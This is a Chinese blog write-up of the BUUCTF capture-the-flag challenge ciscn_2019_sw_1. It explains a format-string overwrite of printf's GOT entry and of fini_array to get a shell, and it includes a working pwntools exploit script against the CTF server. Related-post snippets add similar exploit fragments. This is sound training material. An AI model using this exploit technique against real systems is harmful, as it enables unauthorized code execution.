[BUUCTF-pwn]——ciscn_2019_sw_1

最新推荐文章于 2023-09-22 15:39:55 发布
最新推荐文章于 2023-09-22 15:39:55 发布
阅读量460 收藏
点赞数 1
分类专栏: # BUUCTF # 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/115414371
版权

[BUUCTF-pwn]——ciscn_2019_sw_1

一个简单的格式化字符串, 相信大家看到旁边 的system和格式化字符串漏洞,想的一定是利用格式化字符串漏洞将printf_got表修改system_plt表,然后使其循环调用main第二次输入’/bin/sh’就好

在这里插入图片描述
可能唯一需要说一下的就是, 程序结束时会调用_fini_array指向的函数指针,所以我们将其修改为mian就会循环调用了
算下偏移, 一看就是4
在这里插入图片描述

exploit

from pwn import *

p = remote("node3.buuoj.cn",28235)
#p = process("./ciscn_2019_sw_1")
#gdb.attach(p, 'b printf')
printf_got = 0x0804989C
system_plt = 0x080483D0
fini_array = 0x0804979C
main = 0x8048534
offset = 4
payload = p32(fini_array + 2) + p32(printf_got+2) + p32(printf_got) + p32(fini_array)
payload += "%" + str(0x0804 - 0x10) + "c%4$hn"    
payload += "%5$hn"                               
payload += "%" + str(0x83D0 - 0x0804) + "c%6$hn"  
payload += "%" + str(0x8534 - 0x83D0) + "c%7$hn"  
p.sendlineafter("name?\n",payload)
p.sendlineafter("name?\n",'/bin/sh\x00')
p.interactive()
Y-peak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
BUUCTF之“ciscn_2019_sw_1”
Probeginner的博客
12-26 673
通过fmt改fini_array为main,更加深入理解程序执行
ciscn_2019_sw_1
z1r0的博客
02-21 727
ciscn_2019_sw_1 查看保护 这里有一个格式化漏洞,但是呢这里只能一次。这里学到了一个新姿势在程序结束的时候有一个fini.array段运行。这时将 fini.array[0]的地址改为main函数地址这样就可以运行两次了。这样的话改printf为system之后第二次传入bin/sh即可getshell。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0'
Ciscn_2019_sw1<fini_array>
m0_55906008的博客
09-22 159
​ 在执行main函数之前会调用init_array里的函数,在执行完main函数之后调用fini_array里的函数,因此这道题思路为通过第一次printf劫持printf的got表为system的函数地址,劫持fini_addr为main函数的地址,第二次输入"/bin/sh\x00",当执行到printf(“/bin/sh\x00”)时,由于劫持为system函数,因此执行system(“/bin/sh\x00”),拿到shell。
glibc2.27堆上ORW
tbsqigongzi的博客
10-16 283
ciscn_2019_sw_10
ciscn_2019_sw_1 Writeup
Calllin的博客
05-11 484
前提 RELRO防御策略是当RELRO保护: 为NO RELRO的时候,init.array、fini.array、got.plt均可读可写 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写 为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。 linux程序运行时: 在加载的时候,会依次调用init.array数组中的每一个函数指针 在结束的时候,依次调用fini.array中的每一个函数
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2019_sw_1(fmt劫持fini_array为main,获得一次循环)
m0_51251108的博客
11-13 564
ciscn_2019_sw_1: 主要参考这位师傅:https://www.cnblogs.com/LynneHuan/p/14660529.html#%E7%9F%A5%E8%AF%86%E7%82%B9 先引用下: 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写; 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写; 为FULL RELRO时,init.array
ciscn_2019_sw_1(fmt改fini_array无限循环)
wuyvle的博客
04-30 1432
很明显的格式化漏洞,但是printf只能用一次 我们可以修改fini_array 简单地说,在main函数前会调用.init段代码和.init_array段的函数数组中每一个函数指针。同样的,main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针。 而我们的目标就是修改.fini_array数组的第一个元素为start或者main函数地址。需要注意的是,这个数组的内容在再次从start开始执行后又会被修改,且程序可读取的字节数有限,因此需要一次性修改两个地址并且
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5854
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
ciscn_2019_s_1
doudoudedi
06-29 724
思路 通过off by null写key值然后unlink写bss段再次double free写free_hook即可拿到shell exp: from pwn import * #p=process('./ciscn_s_1') p=remote('node3.buuoj.cn',26429) elf=ELF('./ciscn_s_1') libc=elf.libc def add(idx,size,data): p.sendlineafter('show','1') p.sendlineafte
ciscn_2019_sw_7
seaaseesa的博客
05-01 532
ciscn_2019_sw_7 首先检查一下程序的保护机制 然后,我们用IDA分析一下,最多创建10个堆,并且size不能超过0x60 Delete功能没有清空指针,因此可以double free。 由于size受限制,因此我们需要伪造一个unsorted bin范围的chunk,glibc版本2.27,存在tcache,因此,我们还要先攻击tcache bin表头,篡改对应的...
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2004
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值